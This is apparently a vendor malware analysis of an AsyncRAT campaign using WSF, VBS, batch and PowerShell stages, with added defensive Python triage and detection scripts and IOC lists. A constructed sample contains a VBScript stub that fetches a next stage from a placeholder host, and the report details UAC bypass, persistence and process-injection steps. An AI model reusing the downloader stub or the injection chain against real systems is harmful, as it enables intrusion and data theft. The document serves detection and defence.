The AhnLab Security Emergency response Center (ASEC) analysis team previously posted about AsyncRAT being distributed via files with the .chm extension. [1] The same AsyncRAT malware has recently been found being distributed in WSF script format. The WSF file is delivered inside a compressed (.zip) file that is downloaded from URLs contained in emails.
[Download URLs]
1. https://*****************.com.br/Pay5baea1WP7.zip
2. https://************.za.com/Order_ed333c91f0fd.zip
3. https://*************.com/PAY37846wp.zip
4. https://*****.****.co/eBills37890913.zip
Decompressing the first of the downloaded zip files yields a file with the .wsf extension. As shown in the image below, the file consists mostly of comments and contains only a single <script> tag in the middle.

When this script is executed, a Visual Basic script is downloaded and run, as shown below. That script downloads a .jpg file (actually a zip file disguised as a jpg) from the same C2 address.
It then renames the .jpg file to .zip and decompresses it. A command line that executes Error.vbs, one of the files contained in the archive, is written to an XML file (C:\Users\Public\temp.xml) and run through PowerShell.
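The first stage can be triaged offline without running it. The Python script below is an added example, not code from the ASEC post or from the sample: it strips the XML comments that pad the WSF, pulls out every <script> element, and reports the script language, the URLs it contacts and the COM objects it instantiates. SAMPLE_WSF, its host (192.0.2.10, a documentation address) and its VBScript body are constructed for this example and are not the real myfax_nov272023.wsf.

```python
import re
from html import unescape

# Constructed stand-in for the WSF described above: mostly XML comments with a
# single <script> element in the middle. The host, URL and script body are made
# up for this example and are not taken from the real sample.
SAMPLE_WSF = """<?xml version="1.0" ?>
<job id="fax">
<!-- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -->
<!-- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -->
<!-- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -->
<script language="VBScript">
Set h = CreateObject("MSXML2.XMLHTTP")
h.Open "GET", "http://192.0.2.10:222/c.txt", False
h.Send
Set sh = CreateObject("WScript.Shell")
' next stage would be written to disk and run here
</script>
<!-- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -->
<!-- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -->
<!-- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -->
</job>
"""

COMMENT_RE = re.compile(r"<!--.*?-->", re.DOTALL)
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.DOTALL | re.IGNORECASE)
LANG_RE = re.compile(r'language\s*=\s*"([^"]*)"', re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
COM_RE = re.compile(r'CreateObject\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
HTTP_OBJECTS = ("msxml2.xmlhttp", "msxml2.serverxmlhttp", "microsoft.xmlhttp", "winhttp.winhttprequest")


def comment_ratio(text):
    """Fraction of the file that sits inside XML comments (padding used to bury the script)."""
    commented = sum(len(m.group(0)) for m in COMMENT_RE.finditer(text))
    return commented / max(len(text), 1)


def extract_scripts(text):
    """Return every <script> element that survives comment stripping."""
    out = []
    for attrs, body in SCRIPT_RE.findall(COMMENT_RE.sub("", text)):
        lang = LANG_RE.search(attrs)
        body = unescape(body).strip()
        out.append({
            "language": lang.group(1) if lang else None,
            "urls": URL_RE.findall(body),
            "com_objects": COM_RE.findall(body),
            "body": body,
        })
    return out


def triage(text):
    """Summarise a WSF: comment padding, live scripts, and why it looks like a downloader."""
    scripts = extract_scripts(text)
    reasons = []
    if comment_ratio(text) > 0.5:
        reasons.append("file is mostly comments (padding)")
    for s in scripts:
        objs = {o.lower() for o in s["com_objects"]}
        if any(o.startswith(HTTP_OBJECTS) for o in objs):
            reasons.append("script fetches content over HTTP")
        if "wscript.shell" in objs:
            reasons.append("script can launch commands via WScript.Shell")
    return {"comment_ratio": round(comment_ratio(text), 2), "scripts": scripts, "reasons": reasons}


if __name__ == "__main__":
    result = triage(SAMPLE_WSF)
    print("comment ratio:", result["comment_ratio"])
    for s in result["scripts"]:
        print("script:", s["language"], "urls:", s["urls"], "objects:", s["com_objects"])
    for r in result["reasons"]:
        print("reason:", r)
```

Comments are stripped before the <script> search so that a decoy script inside a comment does not show up as a finding, and the URL list is what you would pivot on when the next stage has already been taken down.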

The downloaded zip file contains many other scripts aside from the Error.vbs file.

Afterwards, the remaining files (bat, ps1) are all executed in order. The role and execution flow of each file are given below.
Error.vbs: Checking for administrator permission and executing Error.bat
Error.bat: Bypassing UAC and executing Error.ps1
Error.ps1: Creating the shortcut file C:\Users\Public\Chrome.lnk, registering it for autorun (registry), then executing it
pwng.bat: Bypassing UAC and executing pwng.ps1
pwng.ps1: Fileless attack

pwng.ps1, which is executed last, decodes strings embedded in the script into .NET binaries, then loads and executes them. It launches a legitimate process (aspnet_compiler.exe) and injects the malicious binary into that process. Three obfuscated variables are used in these steps.

[Meaning of Key Variables]
$jsewy: Malware that performs the features of AsyncRAT (the file to be injected into aspnet_compiler.exe)
$jsewty: Malware that performs the injection feature
$KRDESEY: The process the malware is injected into (C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe)
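A loader of this shape can be recognised statically: a long base64 string that decodes to an MZ/PE image with a CLR runtime header, a call into System.Reflection.Assembly::Load, and the path of a .NET host binary. The Python below is an added example (not the post's code and not pwng.ps1) that performs those three checks. SAMPLE_PS1 is constructed: its variable names and host path follow the post, but the two blobs are minimal fake PE headers built by _fake_pe(), not the actual payload or injector. RegAsm, RegSvcs, InstallUtil and MSBuild are added to the host list from common tradecraft; only aspnet_compiler.exe is from the post.

```python
import base64
import binascii
import re
import struct

PE_SIG = b"PE\x00\x00"
B64_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
# aspnet_compiler.exe is the host named in the post; the others are common injection hosts added here.
HOST_RE = re.compile(r"\b(aspnet_compiler|RegAsm|RegSvcs|InstallUtil|MSBuild)\.exe\b", re.IGNORECASE)
REFLECT_RE = re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.IGNORECASE)


def parse_pe_blob(blob):
    """Return header facts if blob is a PE image, otherwise None."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 26 > len(blob) or blob[e_lfanew:e_lfanew + 4] != PE_SIG:
        return None
    machine, _nsec, _ts, _psym, _nsym, _optsz, chars = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", blob, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)       # data directories: PE32 vs PE32+
    dotnet = False
    if dir_base + 15 * 8 <= len(blob):
        ndirs = struct.unpack_from("<I", blob, dir_base - 4)[0]
        if ndirs > 14:
            rva, size = struct.unpack_from("<II", blob, dir_base + 14 * 8)   # entry 14: CLR runtime header
            dotnet = rva != 0 and size != 0
    return {"machine": hex(machine), "pe32plus": magic == 0x20B, "dll": bool(chars & 0x2000), "dotnet": dotnet}


def scan_powershell(text):
    """Find base64 blobs that decode to PE images, plus the host-process and reflective-load indicators."""
    findings = {
        "embedded_pe": [],
        "host_processes": sorted({m.group(0).lower() for m in HOST_RE.finditer(text)}),
        "reflective_load": bool(REFLECT_RE.search(text)),
    }
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        info = parse_pe_blob(raw)
        if info:
            info.update(offset=m.start(), size=len(raw))
            findings["embedded_pe"].append(info)
    return findings


def _fake_pe(dotnet):
    """Minimal, non-runnable PE32 header used only to build the constructed sample below."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)   # i386, 1 section, PE32 optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                   # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)   # non-zero CLR header directory
    return dos + PE_SIG + coff + bytes(opt)


# Constructed stand-in for pwng.ps1 (variable names and host path follow the post; blobs are fake headers).
SAMPLE_PS1 = f'''
$KRDESEY = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"
$jsewy  = "{base64.b64encode(_fake_pe(True)).decode()}"
$jsewty = "{base64.b64encode(_fake_pe(False)).decode()}"
$inj = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($jsewty))
# the injector would now be invoked with $KRDESEY and the decoded $jsewy
'''

if __name__ == "__main__":
    result = scan_powershell(SAMPLE_PS1)
    for pe in result["embedded_pe"]:
        print("embedded PE at offset", pe["offset"], "size", pe["size"], ".NET:", pe["dotnet"])
    print("host processes:", result["host_processes"], "reflective load:", result["reflective_load"])
```

The CLR check is what separates the two blobs: the payload that gets injected is a managed assembly (non-zero CLR directory), while a native stub would not carry one. In a real sample the strings may be hex, reversed or split across variables rather than plain base64, so the blob-finding regex is the part to adapt; the PE parsing stays the same.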
The malware executed in the end is identified as AsyncRAT which has information exfiltration and backdoor features. The key behaviors are as follows.
1. Maintaining Persistence
– Adding a scheduled task with schtasks
– Adding a registry entry
– Creating a bat file that executes the malware and then deletes itself

2. Exfiltrating Information
– Computer information: OS version, users, anti-malware product list, etc.
– UserData information in browsers: Chrome, Brave-Browser, Edge
– Cryptocurrency wallet information: RabbyWallet, Atomic, Exodus, Ledger_Live, Electrum, Coinomi, Binance, Bitcoin


The C2 server that receives this information is stored in the file as an encrypted string and is decrypted at runtime, as shown below. The malware combines this single C2 domain with multiple port numbers and attempts a connection on each of them.
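Two of the behaviours above are easy to hunt for in endpoint telemetry: the execution chain (script host, batch file and PowerShell ending in aspnet_compiler.exe) and the beaconing pattern (one process contacting the same host on several ports). The Python below is an added example, not from the post, that runs both checks over process-creation and network events. EVENTS is constructed telemetry modelled on the chain described in this post; the destination host and ports are the ones from the IOC list. 6606, 7707 and 8808 are also the default ports in the public AsyncRAT builder, which is why the example checks for that set.

```python
from collections import defaultdict

# Constructed process-creation and network events (not real telemetry) that
# mirror the chain in the post: a script host runs the WSF, a batch file runs
# PowerShell, PowerShell starts aspnet_compiler.exe, and that process then
# connects to one C2 host on several ports. pid 500 is benign noise.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 50,  "image": "C:\\Windows\\explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\wscript.exe"},
    {"type": "process", "pid": 250, "ppid": 200, "image": "C:\\Windows\\System32\\cmd.exe"},
    {"type": "process", "pid": 300, "ppid": 250, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"type": "process", "pid": 400, "ppid": 300, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"},
    {"type": "network", "pid": 400, "dst": "drippmedsot.mywire.org", "port": 6606},
    {"type": "network", "pid": 400, "dst": "drippmedsot.mywire.org", "port": 7707},
    {"type": "network", "pid": 400, "dst": "drippmedsot.mywire.org", "port": 8808},
    {"type": "process", "pid": 500, "ppid": 100, "image": "C:\\Program Files\\Example\\updater.exe"},
    {"type": "network", "pid": 500, "dst": "updates.example.com", "port": 443},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# aspnet_compiler.exe is the host in the post; the others are common injection hosts added here.
NET_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
ASYNCRAT_DEFAULT_PORTS = {6606, 7707, 8808}   # defaults in the public AsyncRAT builder


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def process_table(events):
    return {e["pid"]: e for e in events if e["type"] == "process"}


def ancestry(procs, pid):
    """Image names from the parent of pid up to the last ancestor visible in the events."""
    names, seen = [], set()
    pid = procs[pid]["ppid"]
    while pid in procs and pid not in seen:
        seen.add(pid)
        names.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return names


def find_injected_hosts(events):
    """Flag .NET host binaries whose ancestors include both a script host and a shell."""
    procs = process_table(events)
    hits = []
    for pid, p in procs.items():
        name = basename(p["image"])
        if name not in NET_HOSTS:
            continue
        anc = ancestry(procs, pid)
        if any(a in SHELLS for a in anc) and any(a in SCRIPT_HOSTS for a in anc):
            hits.append({"pid": pid, "image": name, "ancestry": " <- ".join(anc)})
    return hits


def find_multiport_beacons(events, min_ports=2):
    """Flag a process that contacts the same destination host on several distinct ports."""
    ports_by_dst = defaultdict(set)
    for e in events:
        if e["type"] == "network":
            ports_by_dst[(e["pid"], e["dst"])].add(e["port"])
    procs = process_table(events)
    hits = []
    for (pid, dst), ports in ports_by_dst.items():
        if len(ports) < min_ports:
            continue
        hits.append({
            "pid": pid,
            "image": basename(procs[pid]["image"]) if pid in procs else "unknown",
            "dst": dst,
            "ports": sorted(ports),
            "all_asyncrat_default_ports": ports <= ASYNCRAT_DEFAULT_PORTS,
        })
    return hits


if __name__ == "__main__":
    for h in find_injected_hosts(EVENTS):
        print("injection host:", h)
    for b in find_multiport_beacons(EVENTS):
        print("multi-port beacon:", b)
```

The lineage check is deliberately loose (any script host and any shell anywhere above the .NET host) because the real chain in this post passes through several bat and ps1 stages and a .lnk; the multi-port rule does not depend on the port values at all, so it still fires when the operator changes them, and the default-port flag is only an extra confidence signal.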

As shown here, the threat actor distributes the same malware in a variety of ways, using elaborate fileless methods that involve no EXE file on disk. Users must always be cautious when opening files or external links contained in emails, and should use the monitoring features of their security products to identify and block access by threat actors.
[File Detection]
- Downloader/Script.Agent (2023.11.29.02)
- Trojan/VBS.RUNNER.SC194987 (2023.11.30.04)
- Trojan/BAT.RUNNER.SC194988 (2023.11.30.04)
- Trojan/BAT.RUNNER.SC194985 (2023.11.30.04)
- Trojan/PowerShell.Runner.SC194986 (2023.11.30.04)
- Trojan/PowerShell.Generic.SC194981 (2023.11.30.04)
- Trojan/PowerShell.Generic.SC194982 (2023.11.30.04)
- Trojan/Win.Injector (2023.11.30.04)
- Backdoor/Win.AsyncRAT (2022.07.12.00)
[IOC]
- MD5
750dc2354b0454eafd66900687a0f7d6 (myfax_nov272023.wsf)
790562cefbb2c6b9d890b6d2b4adc548 (Error.vbs)
a31191ca8fe50b0a70eb48b82c4d6f39 (Error.bat)
0a80a592d407a2a8b8b318286dc30769 (Error.ps1)
61b7507a6814e81cda6b57850f9f31da (pwng.bat)
ac12d457d3ee177af8824cdc1de47f2a (pwng.ps1)
c09266666ee71ade24e0e5f889cc8199
b98e76816350a6a527fc311dae62b85e
- C2
hxxp://185.81.157[.]242:222/c.txt
hxxp://185.81.157[.]242:222/x.jpg
drippmedsot.mywire[.]org:6606
drippmedsot.mywire[.]org:7707
drippmedsot.mywire[.]org:8808
Source: https://asec.ahnlab.com/en/59573/